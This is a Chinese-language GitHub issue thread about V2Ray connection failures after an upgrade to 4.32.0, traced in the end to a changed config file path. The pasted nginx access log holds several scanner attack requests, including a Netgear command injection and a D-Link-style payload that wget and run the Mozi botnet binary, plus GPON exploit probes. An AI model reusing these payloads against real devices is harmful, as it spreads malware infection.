### ISSUE TITLE
客户端和服务端更新至4.32.0后连接报错

### ISSUE THREAD

**Issue by TxRxTxRx** [v2fly/v2ray-core#381]
除非特殊情况，请完整填写所有问题。不按模板发的 issue 将直接被关闭。
如果你遇到的问题不是 V2Ray 的 bug，比如你不清楚要如何配置，请使用[Discussion](https://github.com/v2fly/discussion/issues)进行讨论。

1) 你正在使用哪个版本的 V2Ray？（如果服务器和客户端使用了不同版本，请注明）
        V2Ray 4.32.0 (V2Fly, a community-driven edition of V2Ray.) Custom (go1.15.3 linux/amd64)
2) 你的使用场景是什么？比如使用 Chrome 通过 Socks/VMess 代理观看 YouTube 视频。
        Chrome 通过 Socks/VMess 代理观看 YouTube 视频。
3) 你看到的不正常的现象是什么？（请描述具体现象，比如访问超时，TLS 证书错误等）
       之前服务端和客户端一直使用v2ray4.27.0版本，能正常使用，今天在服务端通过更新指令（bash <(curl -L https://raw.githubusercontent.com/v2fly/fhs-install-v2ray/master/install-release.sh)）更新后客户端开始连接失败并报错
        客户端连接失败重复以下报错：

2020/11/02 14:06:13 [Warning] v2ray.com/core: V2Ray 4.32.0 started
2020/11/02 14:06:15 [Info] [4153905637] v2ray.com/core/proxy/socks: TCP Connect request to tcp:www.google.com.hk:443
2020/11/02 14:06:15 [Info] [4153905637] v2ray.com/core/app/dispatcher: default route for tcp:www.google.com.hk:443
2020/11/02 14:06:15 tcp:127.0.0.1:59082 accepted tcp:www.google.com.hk:443 [proxy] 
2020/11/02 14:06:15 [Info] [4153905637] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:06:16 [Info] [4153905637] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:06:17 [Info] [4153905637] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:06:18 [Info] [4153905637] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:06:19 [Info] [4153905637] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:06:20 [Warning] [4153905637] v2ray.com/core/app/proxyman/outbound: failed to process outbound traffic > v2ray.com/core/proxy/vmess/outbound: failed to find an available destination > v2ray.com/core/common/retry: [v2ray.com/core/transport/internet/websocket: failed to dial WebSocket > v2ray.com/core/transport/internet/websocket: failed to dial to (wss://520monitor.com/v2ray/monitor): 502 Bad Gateway > websocket: bad handshake] > v2ray.com/core/common/retry: all retry attempts failed
2020/11/02 14:06:20 [Info] [4153905637] v2ray.com/core/app/proxyman/inbound: connection ends > v2ray.com/core/proxy/socks: connection ends > v2ray.com/core/proxy/socks: failed to transport all TCP response > io: read/write on closed pipe

4) 你期待看到的正确表现是怎样的？
    正常连接
5) 请附上你的配置（提交 Issue 前请隐藏服务器端IP地址）。

服务器端配置:

{
  "inbounds": [
  {
    "port": 隐藏,
    "listen":"隐藏",
    "protocol": "vmess",
    "settings": {
      "clients": [
        {
          "id": "隐藏",
          "level": 1,
          "alterId": 64
        }
      ]
    },
    "streamSettings":{
        "network":"ws",
        "wsSettings":{
        "path":"隐藏"
        }
      }
   }
 ],
  "outbounds": [{
    "protocol": "freedom",
    "settings": {}
  },{
    "protocol": "blackhole",
    "settings": {},
    "tag": "blocked"
  }],
  "routing": {
    "rules": [
      {
        "type": "field",
        "ip": ["geoip:private"],
        "outboundTag": "blocked"
      }
    ]
  }
}

客户端配置:

{
  "log": {
    "error": "",
    "loglevel": "info",
    "access": ""
  },
  "inbounds": [
    {
      "listen": "隐藏",
      "protocol": "socks",
      "settings": {
        "udp": false,
        "auth": "noauth"
      },
      "port": "1080"
    },
    {
      "listen": "隐藏",
      "protocol": "http",
      "settings": {
        "timeout": 360
      },
      "port": "1087"
    }
  ],
  "outbounds": [
    {
      "mux": {
        "enabled": false,
        "concurrency": 8
      },
      "protocol": "vmess",
      "streamSettings": {
        "wsSettings": {
          "path": "隐藏",
          "headers": {
            "host": "隐藏"
          }
        },
        "tlsSettings": {
          "allowInsecure": true
        },
        "security": "tls",
        "network": "ws"
      },
      "tag": "proxy",
      "settings": {
        "vnext": [
          {
            "address": "隐藏",
            "users": [
              {
                "id": "隐藏",
                "alterId": 64,
                "level": 1,
                "security": "auto"
              }
            ],
            "port": 443
          }
        ]
      }
    },
    {
      "tag": "direct",
      "protocol": "freedom",
      "settings": {
        "domainStrategy": "UseIP",
        "redirect": "",
        "userLevel": 0
      }
    },
    {
      "tag": "block",
      "protocol": "blackhole",
      "settings": {
        "response": {
          "type": "none"
        }
      }
    }
  ],
  "dns": {},
  "routing": {
    "settings": {
      "domainStrategy": "AsIs",
      "rules": []
    }
  },
  "transport": {}
}

客户端的path&host与服务端的设置一致

6)  请附上出错时软件输出的错误日志。在 Linux 中，日志通常在 `/var/log/v2ray/error.log` 文件中。

服务器端错误日志:

不存在 /var/log/v2ray/error.log 文件
/var/log/v2ray/ 目录为空

客户端错误日志:

2020/11/02 14:06:13 [Warning] v2ray.com/core: V2Ray 4.32.0 started
2020/11/02 14:06:15 [Info] [4153905637] v2ray.com/core/proxy/socks: TCP Connect request to tcp:www.google.com.hk:443
2020/11/02 14:06:15 [Info] [4153905637] v2ray.com/core/app/dispatcher: default route for tcp:www.google.com.hk:443
2020/11/02 14:06:15 tcp:127.0.0.1:59082 accepted tcp:www.google.com.hk:443 [proxy] 
2020/11/02 14:06:15 [Info] [4153905637] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:06:16 [Info] [4153905637] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:06:17 [Info] [4153905637] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:06:18 [Info] [4153905637] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:06:19 [Info] [4153905637] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:06:20 [Warning] [4153905637] v2ray.com/core/app/proxyman/outbound: failed to process outbound traffic > v2ray.com/core/proxy/vmess/outbound: failed to find an available destination > v2ray.com/core/common/retry: [v2ray.com/core/transport/internet/websocket: failed to dial WebSocket > v2ray.com/core/transport/internet/websocket: failed to dial to (wss://520monitor.com/v2ray/monitor): 502 Bad Gateway > websocket: bad handshake] > v2ray.com/core/common/retry: all retry attempts failed
2020/11/02 14:06:20 [Info] [4153905637] v2ray.com/core/app/proxyman/inbound: connection ends > v2ray.com/core/proxy/socks: connection ends > v2ray.com/core/proxy/socks: failed to transport all TCP response > io: read/write on closed pipe
2020/11/02 14:15:25 tcp:127.0.0.1:59266 accepted tcp:accounts.google.com:443 [proxy] 
2020/11/02 14:15:25 [Info] [757317828] v2ray.com/core/proxy/socks: TCP Connect request to tcp:accounts.google.com:443
2020/11/02 14:15:25 [Info] [757317828] v2ray.com/core/app/dispatcher: default route for tcp:accounts.google.com:443
2020/11/02 14:15:25 [Info] [757317828] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:15:26 [Info] [757317828] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:15:26 [Info] [757317828] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:15:27 [Info] [757317828] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:15:29 [Info] [757317828] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:15:30 [Warning] [757317828] v2ray.com/core/app/proxyman/outbound: failed to process outbound traffic > v2ray.com/core/proxy/vmess/outbound: failed to find an available destination > v2ray.com/core/common/retry: [v2ray.com/core/transport/internet/websocket: failed to dial WebSocket > v2ray.com/core/transport/internet/websocket: failed to dial to (wss://520monitor.com/v2ray/monitor): 502 Bad Gateway > websocket: bad handshake] > v2ray.com/core/common/retry: all retry attempts failed
2020/11/02 14:15:30 [Info] [757317828] v2ray.com/core/app/proxyman/inbound: connection ends > v2ray.com/core/proxy/socks: connection ends > v2ray.com/core/proxy/socks: failed to transport all TCP response > io: read/write on closed pipe
2020/11/02 14:15:30 [Info] [857144984] v2ray.com/core/proxy/socks: TCP Connect request to tcp:accounts.google.com:443
2020/11/02 14:15:30 [Info] [857144984] v2ray.com/core/app/dispatcher: default route for tcp:accounts.google.com:443
2020/11/02 14:15:30 [Info] [857144984] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:15:30 tcp:127.0.0.1:59272 accepted tcp:accounts.google.com:443 [proxy] 
2020/11/02 14:15:30 [Info] [857144984] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:15:31 [Info] [857144984] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:15:32 [Info] [857144984] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:15:33 [Info] [857144984] v2ray.com/core/transport/internet/websocket: creating connection to tcp:520monitor.com:443
2020/11/02 14:15:35 [Warning] [857144984] v2ray.com/core/app/proxyman/outbound: failed to process outbound traffic > v2ray.com/core/proxy/vmess/outbound: failed to find an available destination > v2ray.com/core/common/retry: [v2ray.com/core/transport/internet/websocket: failed to dial WebSocket > v2ray.com/core/transport/internet/websocket: failed to dial to (wss://520monitor.com/v2ray/monitor): 502 Bad Gateway > websocket: bad handshake] > v2ray.com/core/common/retry: all retry attempts failed
2020/11/02 14:15:35 [Info] [857144984] v2ray.com/core/app/proxyman/inbound: connection ends > v2ray.com/core/proxy/socks: connection ends > v2ray.com/core/proxy/socks: failed to transport all TCP response > io: read/write on closed pipe

7) 请附上访问日志。在 Linux 中，日志通常在 `/var/log/v2ray/access.log` 文件中。

不存在 /var/log/v2ray/error.log 文件
/var/log/v2ray/ 目录为空

8) 其它相关的配置文件（如 Nginx）和相关日志。

server
    {
        listen 443 ssl http2;
        #listen [::]:443 ssl http2;
        server_name www.520monitor.com 520monitor.com;
        location /v2rayPath {
        proxy_redirect off;
        proxy_pass http:// IP : Port;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_set_header Host $http_host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        }
       省略
}

9) 如果 V2Ray 无法启动，请附上 `--test` 输出。

通常的命令为 `/usr/bin/v2ray/v2ray --test --config /etc/v2ray/config.json`。请按实际情况修改。

10) 如果 V2Ray 服务运行不正常，请附上 journal 日志。

通常的命令为 `journalctl -u v2ray`。

 v2ray.service - V2Ray Service
   Loaded: loaded (/etc/systemd/system/v2ray.service; enabled; vendor preset: en
  Drop-In: /etc/systemd/system/v2ray.service.d
           └─10-donot_touch_single_conf.conf
   Active: active (running) since Mon 2020-11-02 12:40:21 CST; 1h 55min ago
     Docs: https://www.v2fly.org/
 Main PID: 3358 (v2ray)
    Tasks: 8
   Memory: 8.1M
      CPU: 608ms
   CGroup: /system.slice/v2ray.service
           └─3358 /usr/local/bin/v2ray -config /usr/local/etc/v2ray/config.json

**Comment by kslr** [comment]
wss://520monitor.com/v2ray/monitor): 502 Bad Gateway

**Comment by TxRxTxRx** [comment]
> wss://520monitor.com/v2ray/monitor): 502 Bad Gateway

升级版本为什么会造成这个问题？ nginx的配置一直没改过

**Comment by TxRxTxRx** [comment]
补充一下

nginx_error:
2020/11/02 12:54:30 [emerg] 3481#0: bind() to 0.0.0.0:443 failed (98: Address already in use)
2020/11/02 12:54:30 [emerg] 3481#0: bind() to 0.0.0.0:443 failed (98: Address already in use)
2020/11/02 12:54:30 [emerg] 3481#0: bind() to 0.0.0.0:443 failed (98: Address already in use)
2020/11/02 12:54:30 [emerg] 3481#0: bind() to 0.0.0.0:443 failed (98: Address already in use)
2020/11/02 12:54:30 [emerg] 3481#0: bind() to 0.0.0.0:443 failed (98: Address already in use)
2020/11/02 12:54:30 [emerg] 3481#0: still could not bind()

网站log:
61.140.177.188 - - [02/Nov/2020:19:04:56 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:56 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:56 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:56 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:56 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:56 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:57 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:57 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:57 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:58 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:58 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:58 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:59 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:59 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:04:59 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:08:57 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:08:57 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:08:58 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:08:59 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:09:00 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:09:57 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:09:57 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:09:58 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:09:59 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:10:00 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:11:49 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:11:49 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:11:50 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:11:51 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:11:52 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:12:49 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:12:49 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:12:50 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:12:51 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"
61.140.177.188 - - [02/Nov/2020:19:12:52 +0800] "GET /v2ray/monitor HTTP/1.1" 502 150 "-" "Go-http-client/1.1"

access.log:
118.232.208.156 - - [01/Nov/2020:17:20:34 +0800] "GET / HTTP/1.1" 200 1675 "-" "Mozilla/5.0"
128.14.133.58 - - [01/Nov/2020:17:57:10 +0800] "GET / HTTP/1.1" 200 1675 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
156.96.61.147 - - [01/Nov/2020:18:05:30 +0800] "GET / HTTP/1.1" 200 3196 "-" "-"
222.139.91.150 - - [01/Nov/2020:19:25:43 +0800] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 146 "-" "-"
113.88.240.30 - - [01/Nov/2020:21:02:17 +0800] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 146 "-" "-"
59.126.27.57 - - [01/Nov/2020:21:50:00 +0800] "GET / HTTP/1.1" 200 1675 "-" "Mozilla/5.0"
103.41.27.11 - - [01/Nov/2020:22:32:29 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 146 "-" "-"
123.241.0.242 - - [01/Nov/2020:23:50:35 +0800] "GET / HTTP/1.1" 200 1675 "-" "Mozilla/5.0"
185.239.242.117 - - [02/Nov/2020:00:00:58 +0800] "GET /config/getuser?index=0 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
198.245.49.194 - - [02/Nov/2020:00:13:08 +0800] "" 400 0 "-" "-"
128.14.133.58 - - [02/Nov/2020:01:21:35 +0800] "GET / HTTP/1.1" 200 1675 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
220.133.22.128 - - [02/Nov/2020:01:43:31 +0800] "GET / HTTP/1.1" 200 1675 "-" "Mozilla/5.0"
27.222.241.30 - - [02/Nov/2020:01:55:12 +0800] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 150 "-" "-"
5.160.128.32 - - [02/Nov/2020:02:52:29 +0800] "GET / HTTP/1.1" 200 3196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
185.239.242.117 - - [02/Nov/2020:03:18:02 +0800] "GET /config/getuser?index=0 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
155.12.54.52 - - [02/Nov/2020:04:08:50 +0800] "GET / HTTP/1.1" 200 3196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
91.234.62.17 - - [02/Nov/2020:04:32:54 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 146 "-" "Hello, World"
91.234.62.17 - - [02/Nov/2020:04:32:54 +0800] "/tmp/gpon80&ipv=0" 400 150 "-" "-"
193.30.251.240 - - [02/Nov/2020:06:23:52 +0800] "GET / HTTP/1.1" 200 3196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
3.233.224.18 - - [02/Nov/2020:06:38:52 +0800] "" 400 0 "-" "-"
78.189.213.140 - - [02/Nov/2020:06:57:45 +0800] "GET / HTTP/1.1" 200 3196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
220.135.157.30 - - [02/Nov/2020:08:43:38 +0800] "GET / HTTP/1.1" 200 1675 "-" "Mozilla/5.0"
18.144.5.30 - - [02/Nov/2020:10:02:50 +0800] "GET / HTTP/1.1" 200 1675 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
162.142.125.36 - - [02/Nov/2020:10:02:59 +0800] "GET / HTTP/1.1" 200 3196 "-" "-"
162.142.125.36 - - [02/Nov/2020:10:02:59 +0800] "GET / HTTP/1.1" 200 1675 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
103.145.12.230 - - [02/Nov/2020:11:39:56 +0800] "GET / HTTP/1.1" 200 3196 "-" "-"
78.101.180.146 - - [02/Nov/2020:12:04:04 +0800] "GET / HTTP/1.1" 200 1675 "-" "Mozilla/5.0"
218.161.87.224 - - [02/Nov/2020:12:18:57 +0800] "GET / HTTP/1.1" 200 1675 "-" "Mozilla/5.0"
77.179.192.52 - - [02/Nov/2020:13:42:40 +0800] "GET / HTTP/1.1" 200 3196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
117.202.67.116 - - [02/Nov/2020:13:56:32 +0800] "POST /HNAP1/ HTTP/1.0" 404 146 "-" "-"
35.225.214.168 - - [02/Nov/2020:15:07:34 +0800] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-"
34.78.227.165 - - [02/Nov/2020:15:17:17 +0800] "GET / HTTP/1.1" 200 1675 "-" "python-requests/2.24.0"
114.33.97.23 - - [02/Nov/2020:17:49:09 +0800] "GET / HTTP/1.1" 200 1675 "-" "Mozilla/5.0"
202.165.47.242 - - [02/Nov/2020:18:22:50 +0800] "GET / HTTP/1.1" 200 3196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

**Comment by rprx** [comment]
试试 v4.31.3

**Comment by TxRxTxRx** [comment]
> 试试 v4.31.3
服务器端如何降级？

**Comment by jinwyp** [comment]
"listen":"隐藏", 这行去掉


可以试试我的终极脚本 https://github.com/jinwyp/one_click_script

**Comment by TxRxTxRx** [comment]
这个问题已解决了，原因是老版本v2ray的config.json 文件目录为 /etc/v2ray/config.json
而最新v2ray要求的config.json文件目录为 /usr/local/etc/v2ray/config.json
cp过去就解决了

**Comment by TxRxTxRx** [comment]
这个问题已解决了，原因是老版本v2ray的config.json 文件目录为 /etc/v2ray/config.json
而最新v2ray要求的config.json文件目录为 /usr/local/etc/v2ray/config.json
cp过去就解决了

**Comment by onlineyh** [comment]
有点坑 我也踩了一个 为什么还跟换目录？
